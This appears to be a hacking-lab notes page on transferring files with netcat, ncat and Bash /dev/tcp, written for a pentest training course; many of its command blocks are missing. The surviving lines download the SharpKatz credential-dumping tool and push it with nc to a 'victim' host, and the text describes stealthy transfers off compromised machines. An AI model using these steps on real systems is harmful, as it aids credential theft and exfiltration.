search

Transfer Files with Netcat, Ncat, RDP

hashtag
🧱 File Transfers with Netcat & Ncat β€” The Hacker's Swiss Army Knife πŸ—‘οΈ

Whether you're dealing with a firewall, a restricted shell, or a stealthy transfer, netcat (nc) and its upgraded cousin ncat can move files like a boss. πŸ’ͺ🧾

We’ll show how to:

  • πŸ“₯ Send a file to the target

  • πŸ“€ Retrieve a file from the target

  • πŸ” Use both nc and ncat

  • πŸ§ͺ Even use Bash with /dev/tcp for stealthy transfers!

hashtag
πŸ“₯ 1. Netcat - Send File from Attacker ➑️ Target

hashtag
Target: Start Listener (nc)

victim@target:~$ nc -l -p 8000 > SharpKatz.exe

hashtag
Attacker: Send File

z3tssu@htb[/htb]$ wget -q https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe
z3tssu@htb[/htb]$ nc -q 0 192.168.49.128 8000 < SharpKatz.exe

πŸ“Œ -q 0 = Close connection once file is sent

hashtag
πŸ” 2. Using Ncat Instead of Netcat

hashtag
On Target (Receiver):

hashtag
On Attacker (Sender):

hashtag
πŸ” 3. Reverse Connection (Target Initiates)

This method is firewall friendly because outbound connections are usually allowed. πŸ“‘

hashtag
On Attacker: Listen on port 443

hashtag
On Target: Connect and receive

hashtag
πŸ§™β€β™‚οΈ 4. No Netcat? No Problem! Use Bash + /dev/tcp/

If Netcat/Ncat isn’t available, Bash can save the day using a magic file:

hashtag
On Attacker:

hashtag
On Target (Bash):

πŸ“Œ cat reads from the network like a file β€” pure Bash stealth!

hashtag
πŸ”„ Reverse Transfers: Target ➑️ Pwnbox?

Just flip the directions!

  1. πŸ› οΈ On Pwnbox, listen with Netcat or Ncat

  2. πŸ“€ On the compromised machine, connect and send file using:

PreviousUploading FilesNextPowershell Session File Transfer

Last updated